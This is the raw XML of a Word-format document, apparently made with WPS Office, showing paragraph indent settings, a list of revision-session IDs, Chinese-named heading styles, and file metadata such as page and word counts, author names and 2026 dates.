        <w:ind w:left="880" w:firstLine="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1320"/>
        </w:tabs>
        <w:ind w:left="1320" w:firstLine="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1760"/>
        </w:tabs>
        <w:ind w:left="1760" w:firstLine="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2200"/>
        </w:tabs>
        <w:ind w:left="2200" w:firstLine="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2640"/>
        </w:tabs>
        <w:ind w:left="2640" w:firstLine="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3080"/>
        </w:tabs>
        <w:ind w:left="3080" w:firstLine="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3520"/>
        </w:tabs>
        <w:ind w:left="3520" w:firstLine="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3960"/>
        </w:tabs>
        <w:ind w:left="3960" w:firstLine="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2A8"/>
    <w:rsid w:val="00022F76"/>
    <w:rsid w:val="00033A19"/>
    <w:rsid w:val="00063C4C"/>
    <w:rsid w:val="00065473"/>
    <w:rsid w:val="00076053"/>
    <w:rsid w:val="000800A9"/>
    <w:rsid w:val="000A269A"/>
    <w:rsid w:val="000B7DA8"/>
    <w:rsid w:val="000C74C5"/>
    <w:rsid w:val="000E3F5B"/>
    <w:rsid w:val="00126CED"/>
    <w:rsid w:val="001362FD"/>
    <w:rsid w:val="001501CB"/>
    <w:rsid w:val="00166EEA"/>
    <w:rsid w:val="00182DAF"/>
    <w:rsid w:val="00190208"/>
    <w:rsid w:val="001B4632"/>
    <w:rsid w:val="001B5D8E"/>
    <w:rsid w:val="00201F86"/>
    <w:rsid w:val="00251031"/>
    <w:rsid w:val="00272BCF"/>
    <w:rsid w:val="002D657F"/>
    <w:rsid w:val="002E0FFE"/>
    <w:rsid w:val="00320226"/>
    <w:rsid w:val="003231E8"/>
    <w:rsid w:val="003735D5"/>
    <w:rsid w:val="003747AA"/>
    <w:rsid w:val="003966C4"/>
    <w:rsid w:val="003A227F"/>
    <w:rsid w:val="00427B6C"/>
    <w:rsid w:val="0045327F"/>
    <w:rsid w:val="00455855"/>
    <w:rsid w:val="004639E0"/>
    <w:rsid w:val="00467609"/>
    <w:rsid w:val="00474048"/>
    <w:rsid w:val="004A59EA"/>
    <w:rsid w:val="004B57EA"/>
    <w:rsid w:val="004C52D7"/>
    <w:rsid w:val="004D0CE3"/>
    <w:rsid w:val="004E51E2"/>
    <w:rsid w:val="004E741B"/>
    <w:rsid w:val="00537D99"/>
    <w:rsid w:val="00545916"/>
    <w:rsid w:val="00572596"/>
    <w:rsid w:val="00580602"/>
    <w:rsid w:val="0058117A"/>
    <w:rsid w:val="005B0E7C"/>
    <w:rsid w:val="005C509F"/>
    <w:rsid w:val="005D6441"/>
    <w:rsid w:val="005E56AA"/>
    <w:rsid w:val="00646554"/>
    <w:rsid w:val="006A7D08"/>
    <w:rsid w:val="007231F0"/>
    <w:rsid w:val="007240CB"/>
    <w:rsid w:val="00732091"/>
    <w:rsid w:val="00732646"/>
    <w:rsid w:val="00735F65"/>
    <w:rsid w:val="00742DF6"/>
    <w:rsid w:val="007533AD"/>
    <w:rsid w:val="007F2714"/>
    <w:rsid w:val="007F3537"/>
    <w:rsid w:val="00803AC7"/>
    <w:rsid w:val="0081503C"/>
    <w:rsid w:val="008537C2"/>
    <w:rsid w:val="00866FE3"/>
    <w:rsid w:val="0089053D"/>
    <w:rsid w:val="008B7592"/>
    <w:rsid w:val="008F523C"/>
    <w:rsid w:val="00913EFF"/>
    <w:rsid w:val="00923DD0"/>
    <w:rsid w:val="00931FC1"/>
    <w:rsid w:val="00933CEF"/>
    <w:rsid w:val="00935EF2"/>
    <w:rsid w:val="00942FD8"/>
    <w:rsid w:val="009768F1"/>
    <w:rsid w:val="00991345"/>
    <w:rsid w:val="00994713"/>
    <w:rsid w:val="009E02A8"/>
    <w:rsid w:val="009F268A"/>
    <w:rsid w:val="009F6253"/>
    <w:rsid w:val="00A308B4"/>
    <w:rsid w:val="00A328F7"/>
    <w:rsid w:val="00A543D0"/>
    <w:rsid w:val="00A74035"/>
    <w:rsid w:val="00A76FE3"/>
    <w:rsid w:val="00AC032F"/>
    <w:rsid w:val="00AC5AFC"/>
    <w:rsid w:val="00AD1DFE"/>
    <w:rsid w:val="00AE46FC"/>
    <w:rsid w:val="00B0509B"/>
    <w:rsid w:val="00B118F7"/>
    <w:rsid w:val="00B33CC4"/>
    <w:rsid w:val="00B4447A"/>
    <w:rsid w:val="00B47748"/>
    <w:rsid w:val="00B7744C"/>
    <w:rsid w:val="00B83E1F"/>
    <w:rsid w:val="00B952A8"/>
    <w:rsid w:val="00BB16FE"/>
    <w:rsid w:val="00BB5981"/>
    <w:rsid w:val="00BC4CA2"/>
    <w:rsid w:val="00BD7AB0"/>
    <w:rsid w:val="00BF00D6"/>
    <w:rsid w:val="00BF6EF1"/>
    <w:rsid w:val="00C30111"/>
    <w:rsid w:val="00C30CC6"/>
    <w:rsid w:val="00C54C3C"/>
    <w:rsid w:val="00C9546C"/>
    <w:rsid w:val="00CA7E2D"/>
    <w:rsid w:val="00CB0B25"/>
    <w:rsid w:val="00CD559F"/>
    <w:rsid w:val="00CD61D3"/>
    <w:rsid w:val="00D23BD4"/>
    <w:rsid w:val="00D259F4"/>
    <w:rsid w:val="00D2688A"/>
    <w:rsid w:val="00D3138B"/>
    <w:rsid w:val="00D31656"/>
    <w:rsid w:val="00D44675"/>
    <w:rsid w:val="00D63FFA"/>
    <w:rsid w:val="00D7651A"/>
    <w:rsid w:val="00D83369"/>
    <w:rsid w:val="00DA5034"/>
    <w:rsid w:val="00DD1CF7"/>
    <w:rsid w:val="00DD1E1D"/>
    <w:rsid w:val="00DE366A"/>
    <w:rsid w:val="00E169CE"/>
    <w:rsid w:val="00E43460"/>
    <w:rsid w:val="00E66883"/>
    <w:rsid w:val="00E86757"/>
    <w:rsid w:val="00E9566A"/>
    <w:rsid w:val="00EE1F35"/>
    <w:rsid w:val="00F07F38"/>
    <w:rsid w:val="00F27C9F"/>
    <w:rsid w:val="00F366FC"/>
    <w:rsid w:val="00F46587"/>
    <w:rsid w:val="00F46946"/>
    <w:rsid w:val="00F641A1"/>
    <w:rsid w:val="00F778DB"/>
    <w:rsid w:val="00F77BEA"/>
    <w:rsid w:val="00F906A4"/>
    <w:rsid w:val="00FB3C37"/>
    <w:rsid w:val="00FB79AE"/>
    <w:rsid w:val="00FF126D"/>
    <w:rsid w:val="01571BF8"/>
    <w:rsid w:val="02820350"/>
    <w:rsid w:val="07893F2F"/>
    <w:rsid w:val="09E7218A"/>
    <w:rsid w:val="0CB16402"/>
    <w:rsid w:val="0CCC323C"/>
    <w:rsid w:val="0CCE17EE"/>
    <w:rsid w:val="0D2E5C80"/>
    <w:rsid w:val="0DC10F3C"/>
    <w:rsid w:val="0E455054"/>
    <w:rsid w:val="0F4946D0"/>
    <w:rsid w:val="106E29CA"/>
    <w:rsid w:val="122F22A3"/>
    <w:rsid w:val="1246502D"/>
    <w:rsid w:val="15655FDB"/>
    <w:rsid w:val="18277102"/>
    <w:rsid w:val="1881137E"/>
    <w:rsid w:val="19C75132"/>
    <w:rsid w:val="1A002777"/>
    <w:rsid w:val="1CAB4C1C"/>
    <w:rsid w:val="1DE56DBF"/>
    <w:rsid w:val="1DFB0471"/>
    <w:rsid w:val="20C067BC"/>
    <w:rsid w:val="21C916A0"/>
    <w:rsid w:val="22C5455D"/>
    <w:rsid w:val="242A0B1C"/>
    <w:rsid w:val="25113A8A"/>
    <w:rsid w:val="25C428AA"/>
    <w:rsid w:val="26B40B11"/>
    <w:rsid w:val="27BA3F65"/>
    <w:rsid w:val="29DF4157"/>
    <w:rsid w:val="2BBD4024"/>
    <w:rsid w:val="2E86492A"/>
    <w:rsid w:val="30D81900"/>
    <w:rsid w:val="316C70A0"/>
    <w:rsid w:val="31AA6D3A"/>
    <w:rsid w:val="343738A6"/>
    <w:rsid w:val="34522400"/>
    <w:rsid w:val="34CC177B"/>
    <w:rsid w:val="358160C2"/>
    <w:rsid w:val="371157CA"/>
    <w:rsid w:val="373A3BEC"/>
    <w:rsid w:val="38817000"/>
    <w:rsid w:val="39A607ED"/>
    <w:rsid w:val="3A2D189D"/>
    <w:rsid w:val="3B331C0C"/>
    <w:rsid w:val="3C3519B4"/>
    <w:rsid w:val="3CD411CD"/>
    <w:rsid w:val="3D8F3346"/>
    <w:rsid w:val="3F6A5E19"/>
    <w:rsid w:val="3FE84985"/>
    <w:rsid w:val="40F462E2"/>
    <w:rsid w:val="411F45FE"/>
    <w:rsid w:val="41E77BF5"/>
    <w:rsid w:val="42376817"/>
    <w:rsid w:val="42CB3072"/>
    <w:rsid w:val="447B63D2"/>
    <w:rsid w:val="45DF52A6"/>
    <w:rsid w:val="46C713AC"/>
    <w:rsid w:val="4707219F"/>
    <w:rsid w:val="48515DC8"/>
    <w:rsid w:val="4B0C5FD6"/>
    <w:rsid w:val="4B83098E"/>
    <w:rsid w:val="4BD27220"/>
    <w:rsid w:val="4D6C0FAE"/>
    <w:rsid w:val="4E061402"/>
    <w:rsid w:val="4E1F24C4"/>
    <w:rsid w:val="51AA02F7"/>
    <w:rsid w:val="52C6653C"/>
    <w:rsid w:val="52EB7F29"/>
    <w:rsid w:val="536E700A"/>
    <w:rsid w:val="549B44F8"/>
    <w:rsid w:val="54EF2BF0"/>
    <w:rsid w:val="55ED7122"/>
    <w:rsid w:val="55F61D5C"/>
    <w:rsid w:val="58192421"/>
    <w:rsid w:val="5A760E7C"/>
    <w:rsid w:val="5B303F63"/>
    <w:rsid w:val="5BA02E96"/>
    <w:rsid w:val="5C2C0286"/>
    <w:rsid w:val="5C670B52"/>
    <w:rsid w:val="5DED613B"/>
    <w:rsid w:val="5E512226"/>
    <w:rsid w:val="5EC44740"/>
    <w:rsid w:val="611834CF"/>
    <w:rsid w:val="616E7593"/>
    <w:rsid w:val="619C5EAE"/>
    <w:rsid w:val="62061579"/>
    <w:rsid w:val="621719D8"/>
    <w:rsid w:val="63097573"/>
    <w:rsid w:val="63E37DC4"/>
    <w:rsid w:val="654C1999"/>
    <w:rsid w:val="66903B07"/>
    <w:rsid w:val="68000819"/>
    <w:rsid w:val="68AD274F"/>
    <w:rsid w:val="690B12BC"/>
    <w:rsid w:val="6C7421E5"/>
    <w:rsid w:val="6D5D0BE7"/>
    <w:rsid w:val="6D742357"/>
    <w:rsid w:val="6DBB3BAD"/>
    <w:rsid w:val="6DFA4688"/>
    <w:rsid w:val="6E9F6FDD"/>
    <w:rsid w:val="6EEF7A34"/>
    <w:rsid w:val="7150636D"/>
    <w:rsid w:val="71645889"/>
    <w:rsid w:val="727C634F"/>
    <w:rsid w:val="734F7151"/>
    <w:rsid w:val="75236DCA"/>
    <w:rsid w:val="75295853"/>
    <w:rsid w:val="75463985"/>
    <w:rsid w:val="75F37CB7"/>
    <w:rsid w:val="773D6051"/>
    <w:rsid w:val="78866B18"/>
    <w:rsid w:val="78882890"/>
    <w:rsid w:val="79EC68AE"/>
    <w:rsid w:val="7A807CC3"/>
    <w:rsid w:val="7B64707D"/>
    <w:rsid w:val="7C2567D0"/>
    <w:rsid w:val="7DB27B05"/>
    <w:rsid w:val="7EAD4CBB"/>
    <w:rsid w:val="7EED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1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标题 3 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="3"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12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3">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="2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customXml" Target="../customXml/item2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21.jpe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settings" Target="settings.xml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F554E94-1318-413F-AB07-B7AC8F6B0A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Organization</Company>
  <Pages>6</Pages>
  <Words>4176</Words>
  <Characters>12069</Characters>
  <Lines>478</Lines>
  <Paragraphs>454</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14357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2026-06-04T15:36:00Z</dcterms:created>
  <dc:creator>ty qw</dc:creator>
  <cp:lastModifiedBy>保重 少帅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-21T13:06:32Z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eyJoZGlkIjoiNTRlMjczNTFkYmUyYzI1NWVlZTc1MzM3ZDg0ZmQ4ZmEiLCJ1c2VySWQiOiIxNjgwMDEwMzg0In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.26895</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>12BFC1DB663946C5B7DD604ACCA50B07_12</vt:lpwstr>
  </property>
</Properties>
</file>